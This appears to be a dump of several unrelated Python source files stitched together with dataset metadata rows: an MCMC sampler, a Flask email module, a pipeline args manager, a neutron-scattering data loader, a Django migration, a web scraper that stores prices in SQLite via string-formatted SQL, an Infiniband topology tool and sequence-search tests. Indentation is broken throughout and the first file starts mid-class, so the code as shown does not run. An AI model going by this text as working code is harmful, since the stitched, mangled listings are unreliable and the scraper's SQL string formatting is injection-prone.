self.terr = np.sqrt(np.diag(tcov))
self.t0 = topt + choice([2.0, 3.0, -3.0, -2.0], size=len(topt))*self.terr
self.lpost = lpost
self.terr = np.sqrt(np.diag(tcov))
        if discard is None:
self.discard = int(niter/2)
else:
self.discard = int(discard)
        if parname is None:
            self.parname = ['alpha', 'beta', 'gamma', 'delta', 'epsilon', 'zeta', 'eta', 'iota', 'kappa', 'lambda', 'mu']
else:
self.parname = parname
### set up MCMC chain
### possible distributions:
### - 'mvn': multi-variate normal (default)
### - 'stt': student t-test
def create_chain(self, x, y, topt=None, tcov = None, t0 = None, dist='mvn'):
        if topt is not None:
            self.topt = topt
        if tcov is not None:
            self.tcov = tcov
        if t0 is not None:
            self.t0 = t0
### set up distributions
if dist=='mvn':
dist = np.random.multivariate_normal
### set acceptance value to zero
accept = 0.0
### set up array
ttemp, logp = [], []
ttemp.append(self.t0)
#lpost = posterior.PerPosterior(self.ps, self.func)
logp.append(self.lpost(self.t0, neg=False))
for t in np.arange(self.niter-1)+1:
tprop = dist(ttemp[t-1], self.tcov)
            pprop = self.lpost(tprop, neg=False)
logr = pprop - logp[t-1]
logr = min(logr, 0.0)
r= np.exp(logr)
update = choice([True, False], size=1, p=[r, 1.0-r])
if update:
ttemp.append(tprop)
logp.append(pprop)
if t > self.discard:
accept = accept + 1
else:
ttemp.append(ttemp[t-1])
logp.append(logp[t-1])
self.theta = ttemp[self.discard+1:]
self.logp = logp[self.discard+1:]
self.L = self.niter - self.discard
self.accept = accept/self.L
return
def run_diagnostics(self, namestr=None, parname=None, printobj = None):
#if printobj:
# print = printobj
#else:
# from __builtin__ import print as print
print("Markov Chain acceptance rate: " + str(self.accept) +".")
        if namestr is None:
print("No file name string given for printing. Setting to 'test' ...")
namestr = 'test'
        if parname is None:
            parname = ['alpha', 'beta', 'gamma', 'delta', 'epsilon', 'zeta', 'eta', 'iota', 'kappa', 'lambda', 'mu']
fig = plt.figure(figsize=(12,10))
adj =plt.subplots_adjust(hspace=0.4, wspace=0.4)
for i,th in enumerate(self.theta[0]):
ts = np.array([t[i] for t in self.theta])
p1 = plt.subplot(len(self.topt), 3, (i*3)+1)
p1 = plt.plot(ts)
plt.axis([0, len(ts), min(ts), max(ts)])
plt.xlabel("Number of draws")
plt.ylabel("parameter value")
plt.title("Time series for parameter " + str(parname[i]) + ".")
p2 = plt.subplot(len(self.topt), 3, (i*3)+2)
### plotting histogram
            count, bins, ignored = plt.hist(ts, bins=10, density=True)
bnew = np.arange(bins[0], bins[-1], (bins[-1]-bins[0])/100.0)
p2 = plt.plot(bnew, 1.0/(self.terr[i]*np.sqrt(2*np.pi))*np.exp(-(bnew - self.topt[i])**2.0/(2.0*self.terr[i]**2.0)), linewidth=2, color='r')
plt.xlabel('value of ' + str(parname[i]))
plt.ylabel('probability')
plt.title("Histogram for parameter " + str(parname[i]) + ".")
nlags = 30
p3 = plt.subplot(len(self.topt), 3, (i*3)+3)
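            # NOTE: `autocorr` is not defined or imported in this module; it
            # is assumed to be supplied elsewhere in the package (e.g. a
            # helper in BayesPSD.utils).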
            acorr = autocorr(ts, nlags=nlags, norm=True)
p3 = plt.vlines(range(nlags), np.zeros(nlags), acorr, colors='black', linestyles='solid')
plt.axis([0.0, nlags, 0.0, 1.0])
plt.savefig(namestr + "_diag.png", format='png',orientation='landscape')
plt.close()
##############################################################
| bsd-2-clause | -5,221,126,648,205,251,000 | 34.386598 | 157 | 0.569592 | false | 3.849173 | false | false | false |
SirCmpwn/truecraft.io | truecraft/email.py | 1 | 1902 | import smtplib
import pystache
import os
import html
from email.mime.text import MIMEText
from werkzeug.utils import secure_filename
from flask import url_for
from truecraft.database import db
from truecraft.objects import User
from truecraft.config import _cfg, _cfgi
def send_confirmation(user):
if _cfg("smtp-host") == "":
return
smtp = smtplib.SMTP(_cfg("smtp-host"), _cfgi("smtp-port"))
smtp.ehlo()
smtp.starttls()
smtp.login(_cfg("smtp-user"), _cfg("smtp-password"))
with open("emails/confirm-account") as f:
        message = MIMEText(html.unescape(
pystache.render(f.read(), { 'user': user, "domain": _cfg("domain"), 'confirmation': user.confirmation })))
message['X-MC-Important'] = "true"
message['X-MC-PreserveRecipients'] = "false"
message['Subject'] = "Confirm your TrueCraft account"
message['From'] = _cfg("smtp-user")
message['To'] = user.email
smtp.sendmail(_cfg("smtp-user"), [ user.email ], message.as_string())
smtp.quit()
def send_reset(user):
if _cfg("smtp-host") == "":
return
smtp = smtplib.SMTP(_cfg("smtp-host"), _cfgi("smtp-port"))
smtp.ehlo()
smtp.starttls()
smtp.login(_cfg("smtp-user"), _cfg("smtp-password"))
with open("emails/reset") as f:
        message = MIMEText(html.unescape(
pystache.render(f.read(), {
'user': user,
"domain": _cfg("domain"),
"protocol": _cfg("protocol"),
'confirmation': user.passwordReset
})))
message['X-MC-Important'] = "true"
message['X-MC-PreserveRecipients'] = "false"
message['Subject'] = "Reset your TrueCraft password"
message['From'] = _cfg("smtp-user")
message['To'] = user.email
smtp.sendmail(_cfg("smtp-user"), [ user.email ], message.as_string())
smtp.quit()
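# Usage sketch (assumes a user object exposing `email`, `confirmation` and
# `passwordReset`, as referenced above):
#
#   send_confirmation(user)  # after registration
#   send_reset(user)         # after a password-reset request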
| mit | -3,450,600,462,201,061,000 | 35.576923 | 118 | 0.618297 | false | 3.535316 | false | false | false |
joaduo/mepinta | core/python_core/mepinta/pipeline/lo/pipeline_evaluator/ProcessorArgsManager.py | 1 | 3800 | # -*- coding: utf-8 -*-
'''
Mepinta
Copyright (c) 2011-2012, Joaquin G. Duo, [email protected]
This file is part of Mepinta.
Mepinta is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Mepinta is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Mepinta. If not, see <http://www.gnu.org/licenses/>.
'''
from pipeline_backend.args_management.args_management import createArgs, argsAppendProp,\
argsSetChanged, argsSetUnchanged, argsBuildChangedSet,\
argsSetCapacity, getThreadArgs, argsSetThreadId
from mepinta.pipeline.lo.constants import OUTPUT_PROPS, CUSTOM_OUTPUT_PROPS,\
INPUT_PROPS, CUSTOM_INPUT_PROPS
#from pipeline_backend.args_management.argsSetProcessorContext import argsSetProcessorContext
# TODO: Rename ProcessorArgsManager ProcessorArgsBuilder
# TODO: check getThreadArgs and threading
class ProcessorArgsManager(object):
def __init__(self, context_lo, func_prop_value, thread_id):
self.context_lo = context_lo
self.args = self.createArgs(func_prop_value, thread_id)
self.indexes = {INPUT_PROPS: 0,
OUTPUT_PROPS: 0,
CUSTOM_INPUT_PROPS: 0,
CUSTOM_OUTPUT_PROPS: 0}
self.marked = False
def setInOut(self, in_out_id):
self.in_out_id = in_out_id
def __getCurrentIndex(self):
return self.indexes[self.in_out_id]
def __incrementCurrentIndex(self, delta=1):
self.indexes[self.in_out_id] += delta
def createArgs(self, func_prop_value, thread_id):
# if cached:
        if func_prop_value.args is None:
self.new_args = True
#func_prop_value.args = createArgs(in_size,out_size)
func_prop_value.args = createArgs(0, 0)
else:
self.new_args = False
argsSetThreadId(func_prop_value.args, thread_id)
return func_prop_value.args
# else:
# self.new_args = True
# return getThreadArgs(in_size,out_size,thread_id)
def getArgs(self):
return self.args
# def setProcessorContext(self, processor_context):
# argsSetProcessorContext(self.args, processor_context)
def nextProp(self): # useful for skipping a property too
self.__incrementCurrentIndex(1)
def append(self, prop_id, prop, prop_real):
data_type = self.context_lo.data_types[prop_real.dtype_id]
        argsAppendProp(self.args, self.in_out_id, self.__getCurrentIndex(),
                       prop_id, prop, prop_real, data_type)
# def update(self, in_prop_ids, out_prop_ids):
# raise RuntimeError("Implement")
def changedValue(self):
argsSetChanged(self.args, self.in_out_id, self.__getCurrentIndex())
def unchangedValue(self):
argsSetUnchanged(self.args, self.in_out_id, self.__getCurrentIndex())
def buildChangedSet(self):
changed = set()
argsBuildChangedSet(self.args, OUTPUT_PROPS, changed)
argsBuildChangedSet(self.args, CUSTOM_OUTPUT_PROPS, changed)
return changed
def shedskin_ProcessorArgsManager(context_lo, func_prop_value, prop):
pam = ProcessorArgsManager(context_lo, func_prop_value, thread_id=0)
prop_id = 100
pam.setInOut(in_out_id=1)
pam.append(prop_id, prop, prop)
pam.getArgs()
pam.nextProp()
pam.append(prop_id, prop, prop)
pam.changedValue()
pam.unchangedValue()
pam.buildChangedSet()
return pam
| gpl-3.0 | 296,367,880,663,941,250 | 35.538462 | 108 | 0.687105 | false | 3.457689 | false | false | false |
granrothge/neutronpy | neutronpy/fileio/loaders/ice.py | 3 | 1564 | from collections import OrderedDict
import numpy as np
from ...data import Data
from ...instrument import Instrument
class Ice(Data):
r"""Loads ICE (NCNR) format ascii data file.
"""
def __init__(self):
super(Ice, self).__init__()
def load(self, filename, build_hkl=True, load_instrument=False):
r"""Loads the ICE (NCNR) format ascii data file.
Parameters
----------
filename : str
Path to file to open
build_hkl : bool, optional
Option to build Q = [h, k, l, e, temp]
load_instrument : bool, optional
Option to build Instrument from file header
"""
        with open(filename) as f:
            file_header = []
            for line in f:
                if 'Columns' in line:
                    args = line.split()
                    col_headers = [head for head in args[1:]]
                    break
                file_header.append(line)
args = np.genfromtxt(filename, usecols=(0, 1, 2, 3, 4, 5, 6, 7, 8),
unpack=True, comments="#", dtype=np.float64)
data = OrderedDict()
for head, col in zip(col_headers, args):
data[head] = col
self._data = data
self.data_keys = {'detector': 'Detector', 'monitor': 'Monitor', 'time': 'Time'}
self._file_header = file_header
if build_hkl:
self.Q_keys = {'h': 'QX', 'k': 'QY', 'l': 'QZ', 'e': 'E', 'temp': 'Temp'}
if load_instrument:
instrument = Instrument()
self.instrument = instrument
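# Usage sketch (hypothetical file name):
#
#   ice = Ice()
#   ice.load('scan0001.ng5', build_hkl=True)
#   print(ice.data_keys)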
| mit | -5,627,910,622,072,859,000 | 26.928571 | 87 | 0.514066 | false | 4.010256 | false | false | false |
rit-sailing/website | main/migrations/0001_initial.py | 1 | 2192 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-18 02:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Request',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254)),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('year_level', models.CharField(choices=[(b'1', b'1st'), (b'2', b'2nd'), (b'3', b'3rd'), (b'4', b'4th'), (b'5', b'5th'), (b'6', b'Other')], default=b'1', max_length=1)),
('accepted', models.BooleanField(default=False)),
('was_checked', models.BooleanField(default=False, editable=False)),
],
),
migrations.CreateModel(
name='TeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('year_level', models.CharField(choices=[(b'1', b'1st'), (b'2', b'2nd'), (b'3', b'3rd'), (b'4', b'4th'), (b'5', b'5th'), (b'6', b'Other')], default=b'1', max_length=1)),
('sailing_level', models.CharField(choices=[(b'1', b'Beginner'), (b'2', b'Intermediate'), (b'3', b'Race')], default=b'1', max_length=1)),
('eboard_pos', models.CharField(blank=True, max_length=50)),
('phone_number', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128)),
('dues_paid', models.DateField(blank=True, null=True)),
('avatar', models.URLField(blank=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| mit | 1,183,421,625,357,386,800 | 47.711111 | 185 | 0.577099 | false | 3.541195 | false | false | false |
ppinard/pyxray | pyxray/composition.py | 2 | 10366 | """"""
__all__ = ["Composition"]
# Standard library modules.
import math
from types import MappingProxyType
import itertools
from fractions import Fraction
import re
# Third party modules.
import pyxray
# Local modules.
# Globals and constants variables.
CHEMICAL_FORMULA_PATTERN = re.compile(r"([A-Z][a-z]?)([0-9\.]*)")
def process_wildcard(fractions):
"""
Processes element with a wildcard ``?`` weight fraction and returns
composition balanced to 1.0.
"""
wildcard_zs = set()
total_fraction = 0.0
for z, fraction in fractions.items():
if fraction == "?":
wildcard_zs.add(z)
else:
total_fraction += fraction
if not wildcard_zs:
return fractions
balance_fraction = (1.0 - total_fraction) / len(wildcard_zs)
for z in wildcard_zs:
fractions[z] = balance_fraction
return fractions
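# Example (sketch): the single '?' entry absorbs the remaining fraction,
# so process_wildcard({5: '?', 25: 0.4}) returns {5: 0.6, 25: 0.4}.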
def convert_mass_to_atomic_fractions(mass_fractions):
"""
Converts a mass fraction :class:`dict` to an atomic fraction :class:`dict`.
Args:
mass_fractions (dict): mass fraction :class:`dict`.
The composition is specified by a dictionary.
The keys are atomic numbers and the values weight fractions.
            No wildcards are accepted.
"""
atomic_fractions = {}
for z, mass_fraction in mass_fractions.items():
atomic_fractions[z] = mass_fraction / pyxray.element_atomic_weight(z)
total_fraction = sum(atomic_fractions.values())
for z, fraction in atomic_fractions.items():
try:
atomic_fractions[z] = fraction / total_fraction
except ZeroDivisionError:
atomic_fractions[z] = 0.0
return atomic_fractions
def convert_atomic_to_mass_fractions(atomic_fractions):
"""
Converts an atomic fraction :class:`dict` to a mass fraction :class:`dict`.
Args:
atomic_fractions (dict): atomic fraction :class:`dict`.
The composition is specified by a dictionary.
The keys are atomic numbers and the values atomic fractions.
            No wildcards are accepted.
"""
# Calculate total atomic mass
atomic_masses = {}
total_atomic_mass = 0.0
for z, atomic_fraction in atomic_fractions.items():
atomic_mass = pyxray.element_atomic_weight(z)
atomic_masses[z] = atomic_mass
total_atomic_mass += atomic_fraction * atomic_mass
# Create mass fraction
mass_fractions = {}
for z, atomic_fraction in atomic_fractions.items():
mass_fractions[z] = atomic_fraction * atomic_masses[z] / total_atomic_mass
return mass_fractions
def convert_formula_to_atomic_fractions(formula):
"""
Converts a chemical formula to an atomic fraction :class:`dict`.
Args:
        formula (str): chemical formula, like Al2O3. No wildcards are accepted.
"""
mole_fractions = {}
total_mole_fraction = 0.0
for match in CHEMICAL_FORMULA_PATTERN.finditer(formula):
symbol, mole_fraction = match.groups()
z = pyxray.element_atomic_number(symbol.strip())
if mole_fraction == "":
mole_fraction = 1.0
        mole_fraction = float(mole_fraction)
mole_fractions[z] = mole_fraction
total_mole_fraction += mole_fraction
# Calculate atomic fractions
atomic_fractions = {}
for z, mole_fraction in mole_fractions.items():
atomic_fractions[z] = mole_fraction / total_mole_fraction
return atomic_fractions
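# Example (sketch): convert_formula_to_atomic_fractions('Al2O3') returns
# {13: 0.4, 8: 0.6} -- two Al and three O atoms out of five.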
def generate_name(atomic_fractions):
"""
Generates a name from the composition.
The name is generated on the basis of a classical chemical formula.
"""
if not atomic_fractions:
return ""
if len(atomic_fractions) == 1:
z = list(atomic_fractions.keys())[0]
return pyxray.element_symbol(z)
symbols = []
fractions = []
for z in sorted(atomic_fractions.keys(), reverse=True):
symbols.append(pyxray.element_symbol(z))
fractions.append(Fraction(atomic_fractions[z]).limit_denominator())
# Find gcd of the fractions
gcds = []
for a, b in itertools.combinations(fractions, 2):
gcds.append(math.gcd(a.denominator, b.denominator))
smallest_gcd = min(gcds)
# Write formula
name = ""
for symbol, fraction in zip(symbols, fractions):
mole_fraction = int(fraction * smallest_gcd)
if mole_fraction == 0:
continue
elif mole_fraction == 1:
name += "%s" % symbol
else:
name += "%s%i" % (symbol, mole_fraction)
return name
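# Example (sketch): generate_name({13: 0.4, 8: 0.6}) returns 'Al2O3';
# elements are emitted in order of decreasing atomic number.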
class Composition:
"""
Defines a composition of a compound.
To create a composition, use the class methods:
- :meth:`from_pure`
- :meth:`from_formula`
- :meth:`from_mass_fractions`
- :meth:`from_atomic_fractions`
Use the following attributes to access the composition values:
- :attr:`mass_fractions`: :class:`dict` where the keys are atomic numbers and the values weight fractions.
- :attr:`atomic_fractions`: :class:`dict` where the keys are atomic numbers and the values atomic fractions.
- :attr:`formula`: chemical formula
The composition object is immutable, i.e. it cannot be modified once created.
Equality can be checked.
It is hashable.
It can be pickled or copied.
"""
_key = object()
PRECISION = 0.000000001 # 1ppb
def __init__(self, key, mass_fractions, atomic_fractions, formula):
"""
Private constructor. It should never be used.
"""
if key != Composition._key:
raise TypeError("Composition cannot be created using constructor")
if set(mass_fractions.keys()) != set(atomic_fractions.keys()):
raise ValueError("Mass and atomic fractions must have the same elements")
self.mass_fractions = MappingProxyType(mass_fractions)
self.atomic_fractions = MappingProxyType(atomic_fractions)
self._formula = formula
@classmethod
def from_pure(cls, z):
"""
Creates a pure composition.
Args:
z (int): atomic number
"""
return cls(cls._key, {z: 1.0}, {z: 1.0}, pyxray.element_symbol(z))
@classmethod
def from_formula(cls, formula):
"""
Creates a composition from a chemical formula.
Args:
formula (str): chemical formula
"""
atomic_fractions = convert_formula_to_atomic_fractions(formula)
return cls.from_atomic_fractions(atomic_fractions)
@classmethod
def from_mass_fractions(cls, mass_fractions, formula=None):
"""
Creates a composition from a mass fraction :class:`dict`.
Args:
mass_fractions (dict): mass fraction :class:`dict`.
The keys are atomic numbers and the values weight fractions.
            Wildcards are accepted, e.g. ``{5: '?', 25: 0.4}`` where boron
will get a mass fraction of 0.6.
formula (str): optional chemical formula for the composition.
If ``None``, a formula will be generated for the composition.
"""
mass_fractions = process_wildcard(mass_fractions)
atomic_fractions = convert_mass_to_atomic_fractions(mass_fractions)
if not formula:
formula = generate_name(atomic_fractions)
return cls(cls._key, mass_fractions, atomic_fractions, formula)
@classmethod
def from_atomic_fractions(cls, atomic_fractions, formula=None):
"""
Creates a composition from an atomic fraction :class:`dict`.
Args:
atomic_fractions (dict): atomic fraction :class:`dict`.
The keys are atomic numbers and the values atomic fractions.
            Wildcards are accepted, e.g. ``{5: '?', 25: 0.4}`` where boron
            will get an atomic fraction of 0.6.
formula (str): optional chemical formula for the composition.
If ``None``, a formula will be generated for the composition.
"""
atomic_fractions = process_wildcard(atomic_fractions)
mass_fractions = convert_atomic_to_mass_fractions(atomic_fractions)
if not formula:
formula = generate_name(atomic_fractions)
return cls(cls._key, mass_fractions, atomic_fractions, formula)
def __len__(self):
return len(self.mass_fractions)
def __contains__(self, z):
return z in self.mass_fractions
def __iter__(self):
return iter(self.mass_fractions.keys())
def __repr__(self):
return "<{}({})>".format(self.__class__.__name__, self.inner_repr())
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if len(self) != len(other):
return False
for z in self.mass_fractions:
if z not in other.mass_fractions:
return False
fraction = self.mass_fractions[z]
other_fraction = other.mass_fractions[z]
if not math.isclose(fraction, other_fraction, abs_tol=self.PRECISION):
return False
return True
def __ne__(self, other):
return not self == other
def __hash__(self):
out = []
for z in sorted(self.mass_fractions):
out.append(z)
out.append(int(self.mass_fractions[z] / self.PRECISION))
return hash(tuple(out))
def __getstate__(self):
return {
"mass_fractions": dict(self.mass_fractions),
"atomic_fractions": dict(self.atomic_fractions),
"formula": self.formula,
}
def __setstate__(self, state):
self.mass_fractions = MappingProxyType(state.get("mass_fractions", {}))
self.atomic_fractions = MappingProxyType(state.get("atomic_fractions", {}))
self._formula = state.get("formula", "")
def is_normalized(self):
return math.isclose(
sum(self.mass_fractions.values()), 1.0, abs_tol=self.PRECISION
)
def inner_repr(self):
return ", ".join(
"{}: {:.4f}".format(pyxray.element_symbol(z), mass_fraction)
for z, mass_fraction in self.mass_fractions.items()
)
@property
def formula(self):
return self._formula
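# Usage sketch: the constructors are interchangeable for simple cases.
#
#   c1 = Composition.from_formula('Al2O3')
#   c2 = Composition.from_atomic_fractions({13: 0.4, 8: 0.6})
#   assert c1 == c2  # equality compares mass fractions within PRECISION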
| mit | 43,317,252,037,900,280 | 30.412121 | 116 | 0.613737 | false | 3.957999 | false | false | false |
sergiosvieira/cstore-warning | main.py | 1 | 4521 | #!env/bin/python
import requests
import lxml.html
import pprint
from sqlite3 import dbapi2 as sqlite3
def get_table():
payload = {
'keys': '',
'srch_disp': 1,
'srch_fab': -1,
'sec': 'busca.php',
'Submit': 'eviou',
'srch_from': '',
'srch_withctg': 'true',
'srch_pos': '#lista',
'srch_ctg': '-1',
'srch_sctg': '-1',
'out_format': 'Y',
'srch_val': '',
'srch_val2': '',
'Submit2.x': '12',
'Submit2.y': '13'
}
url = 'http://www.cstore.com.br/busca.php'
response = requests.get(url, params=payload)
return response.text
def create_list(text):
root = lxml.html.fromstring(text)
result = root.xpath("//tr//td//text()")
result = [item.strip() for item in result]
result = [item for item in result if len(item) > 0]
return result
def chunks(a_list, a_size):
return [a_list[item:item+a_size] for item in range(0, len(a_list), a_size)]
"""DATABASE"""
def connect_db(a_database_name):
"""Connects to the specific database."""
rv = sqlite3.connect(a_database_name)
rv.row_factory = sqlite3.Row
return rv
def close_db(a_connection):
a_connection.close()
def show_entries(a_connection):
cur = a_connection.execute('SELECT * FROM products ORDER BY product_id DESC')
return cur.fetchall()
def show_product(a_connection, a_product_id):
cur = a_connection.execute('SELECT * FROM products WHERE product_id = "%s"' % (a_product_id))
return cur.fetchall()
def add_entry(a_connection, a_product_id, a_title, a_price, a_available, a_difference):
sql = 'INSERT INTO products (product_id, title, price, available, current_difference) VALUES ("%s", "%s", %f, "%s", %f)' % (a_product_id, a_title, a_price, a_available, a_difference)
cur = a_connection.execute(sql)
def add_history(a_connection, a_product_id, a_price, a_available):
sql = 'INSERT INTO history (product_id, price, available) VALUES ("%s", %f, "%s")' % (a_product_id, a_price, a_available)
a_connection.execute(sql)
def update_entry(a_connection, a_product_id, a_title, a_price, a_available, a_difference):
sql = 'UPDATE products set title="%s", price=%f, available="%s", current_difference=%f WHERE product_id = "%s"' % (a_title, a_price, a_available, a_difference, a_product_id)
print(sql)
a_connection.execute(sql)
def print_update_entry(a_db, a_product_id, a_title, a_old_price, a_new_price, a_difference, a_available):
print("[%s] - %s - O.P: %f - N.P: %f - %f - [%s]" % (a_product_id, a_title, a_old_price, a_new_price, a_difference, a_available))
update_entry(a_db, a_product_id, a_title, a_new_price, a_available, a_difference)
a_db.commit()
add_history(a_db, a_product_id, a_old_price, a_available)
a_db.commit()
def main():
print("Getting products list...")
rows = create_list(get_table())
rows = rows[6:]
print("Spliting list...")
rows = chunks(rows, 5)
print("Database...")
db = connect_db('cstore.db')
counter_updates = 0
counter_adds = 0
for row in rows:
# remote values
product_id = row[0]
title = row[1].replace('"', '')
price = row[2].replace('.', '')
price = float(price.replace(',', '.'))
available = row[3]
# local values
query = show_product(db, product_id)
if len(query) == 0:
print("[New Product]")
print("[%s] - %s - %f - [%s]" % (product_id, title, price, available))
print()
            add_entry(db, product_id, title, price, available, 0.)
counter_adds += 1
else:
q_product_id = query[-1][1]
q_title = query[-1][2].replace('"', '')
q_price = query[-1][3]
q_available = query[-1][4]
diff = price - q_price
if (int(diff) != 0) or (available != q_available):
print(available, q_available)
if int(diff) != 0:
print("[Updated Price]", end='')
if available != q_available:
print("[Updated Availability]", end='')
print()
                print_update_entry(db, product_id, q_title, q_price, price, diff, q_available)
print()
counter_updates += 1
db.commit()
close_db(db)
print("Updated Products =", counter_updates)
print("Added Products =", counter_adds)
if __name__ == '__main__':
main()
| apache-2.0 | -1,859,665,363,803,991,300 | 35.168 | 186 | 0.568458 | false | 3.25018 | false | false | false |
jabl/ibtopo2dot | src/ibtopotool.py | 2 | 7667 | #!/usr/bin/env python3
# -*- mode: python; -*-
# -*- coding: utf-8 -*-
# vim: set fileencoding=utf-8
"""
ibtopotool, a tool to do things with Infiniband topology.
Copyright (C) 2013-2020 Janne Blomqvist
This Source Code Form is subject to the terms of the Mozilla Public
License, v. 2.0. If a copy of the MPL was not distributed with this
file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
import networkx as nx
def speed2weight(speed):
"""Convert an IB speed to an edge weight
See e.g. https://en.wikipedia.org/wiki/InfiniBand
"""
ss = speed.split('x')
nlinks = int(ss[0])
s1 = ss[1]
if s1 == 'SDR':
s = 2
elif s1 == 'DDR':
s = 4
elif s1 == 'QDR':
s = 8
elif s1 == 'FDR10':
s = 10 # ???
elif s1 == 'FDR':
s = 13.64
elif s1 == 'EDR':
s = 24.24
elif s1 == 'HDR':
s = 50 # roughly??
elif s1 == 'NDR':
s = 100 # roughly?
elif s1 == 'XDR':
s = 250 # the future?
else:
raise NotImplementedError('Support for Infiniband speed %s not implemented' % s1)
return nlinks * s
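# Example (sketch): the speed string pairs the lane count with the data rate,
# e.g. speed2weight('4xFDR') == 4 * 13.64 == 54.56.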
def parse_ibtopo(topofile, shortlabel):
"""
Parse an Infiniband topology file as generated by ibnetdiscover.
Returns: A networkx graph representing the IB network
"""
g = nx.DiGraph()
switchidx = 0 # Index switches sequentially
with open(topofile, 'r') as f:
inblock = False # Switch or Host (Channel Adapter) block
for line in f:
if line.startswith('Switch'):
inblock = True
guid = line.split()[2][1:-1]
i = line.index('#')
s = line[i:].split('"')
nodedesc = s[1]
sid = "s%d" % switchidx
if shortlabel:
label = sid
else:
label = "%s\n%s" % (guid, nodedesc)
g.add_node(guid, desc=nodedesc, type='Switch', label=label)
switchidx += 1
elif line.startswith('Ca'):
inblock = True
guid = line.split()[2][1:-1]
i = line.index('#')
s = line[i:].split('"')
nodedesc = s[1].split()[0]
g.add_node(guid, label=nodedesc, type='Host')
elif len(line) == 0 or line.isspace():
inblock = False
elif inblock:
ls = line.split()
destguid = ls[1].split('"')[1]
w = speed2weight(ls[-1])
# If the edge already exists, add the weigth to it
try:
g[guid][destguid]['weight'] += w
g[guid][destguid]['penwidth'] += 1
except KeyError:
g.add_edge(guid, destguid, weight=w)
g[guid][destguid]['penwidth'] = 1
return g
def gen_dot(graph, out):
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, out)
def gen_slurm(g, out):
"""
g: A networkx graph representing the IB network
out: Output file-like object
"""
try:
import hostlist
except ImportError:
print("""To generate a slurm topology.conf, you need to install
python-hostlist, https://pypi.python.org/pypi/python-hostlist""")
raise
out.write('# topology.conf generated by ibtopo2dot.py\n')
for n, nbrs in g.adjacency():
if g.nodes[n]['type'] == 'Switch':
switches = []
nodes = []
for nbr in nbrs:
if g.nodes[nbr]['type'] == 'Switch':
switches.append(g.nodes[nbr]['label'])
else:
nodename = g.nodes[nbr]['label']
nodes.append(nodename)
switchstring = ""
if len(switches) > 0:
switches.sort()
switchstring = " Switches=" + hostlist.collect_hostlist(switches)
nodestr = ''
if len(nodes) > 0:
nodes.sort()
nodestr = " Nodes=" + hostlist.collect_hostlist(nodes)
out.write('SwitchName=%s%s%s\n' % (g.nodes[n]['label'],
switchstring, nodestr))
def treeify(g, rootfile):
"""Generate a DAG with roots given in the file rootfile"""
roots = []
with open(rootfile, 'r') as f:
for line in f:
l = line.strip()
if l.startswith('#') or len(l) == 0:
continue
ii = l.find('#')
if ii >= 1:
l = l[:ii].rstrip()
roots.append(l)
for root in roots:
# Mark the roots with color for graphviz
g.nodes[root]['fillcolor'] = 'red'
g.nodes[root]['style'] = 'filled'
# Mark the roots as roots for graphviz
g.nodes[root]['root'] = 'true'
g.nodes[root]['rank'] = 0
# Calculate distance from roots for all nodes
for n in g.nodes():
if n in roots:
continue
l = []
for root in roots:
l.append(nx.shortest_path_length(g, n, root))
g.nodes[n]['rank'] = min(l)
# Drop all edges that go towards the roots, based on the ranks we
# just computed
todel = []
for n, nbrs in g.adjacency():
for nbr in nbrs:
if g.nodes[n]['rank'] > g.nodes[nbr]['rank']:
todel.append((n, nbr))
g.remove_edges_from(todel)
return g
def only_switches(g):
"""Filter out nodes that are not switches"""
    return g.subgraph([n for n, attrs in g.nodes.items()
                       if attrs['type'] == 'Switch'])
def relabel_switch_tree(g):
"""If shortlabels and treeify is in effect, relabel switches taking
into account the rank (distance from root(s)) in the tree.
"""
srl = {} # rank:labelindex dict
for n in g.nodes():
if g.nodes[n]['type'] == 'Switch':
r = g.nodes[n]['rank']
if not r in srl:
srl[r] = 0
g.nodes[n]['label'] = 's%d-%d' % (r, srl[r])
srl[r] += 1
if __name__ == '__main__':
from optparse import OptionParser
import sys
usage = """%prog [options] ibtopofile
ibtopofile is a file containing the output of 'ibnetdiscover'."""
parser = OptionParser(usage)
parser.add_option('-s', '--switches', dest='switches',
action='store_true',
help='Include only switch nodes')
parser.add_option('-o', '--output', dest='output',
help='Output file, if omitted stdout')
parser.add_option('--slurm', dest='slurm', action='store_true',
help='Output in slurm topology.conf format. Implies --shortlabels.')
parser.add_option('-t', '--treeify', dest='treeify',
help="Give a file containing GUID's for spine switches")
parser.add_option('--shortlabels', dest='shortlabels', action='store_true',
help='Use short labels for switches')
(options, args) = parser.parse_args()
if len(args) == 0:
parser.print_help()
sys.exit(1)
if options.slurm:
options.shortlabels = True
graph = parse_ibtopo(args[0], options.shortlabels)
if options.output:
out = open(options.output, 'w')
else:
out = sys.stdout
if options.switches:
graph = only_switches(graph)
if options.treeify:
graph = treeify(graph, options.treeify)
if options.shortlabels:
relabel_switch_tree(graph)
if options.slurm:
gen_slurm(graph, out)
else:
gen_dot(graph, out)
| mit | 256,450,862,748,284,500 | 32.190476 | 90 | 0.520673 | false | 3.758333 | false | false | false |
maehler/seqpoet | seqpoet/tests/test_search.py | 1 | 2437 | from collections import defaultdict
import os
from nose.tools import raises
from nose.plugins.skip import SkipTest
from seqpoet.search import search, hamming_distance
from seqpoet import Sequence
from seqpoet import GenBank
from seqpoet.genbank import Location
class TestHammingDistance:
@raises(ValueError)
def test_sequences_of_different_length(self):
hamming_distance('gattaca', 'gatt')
def test_wikipedia_examples(self):
assert hamming_distance('karolin', 'kathrin') == 3
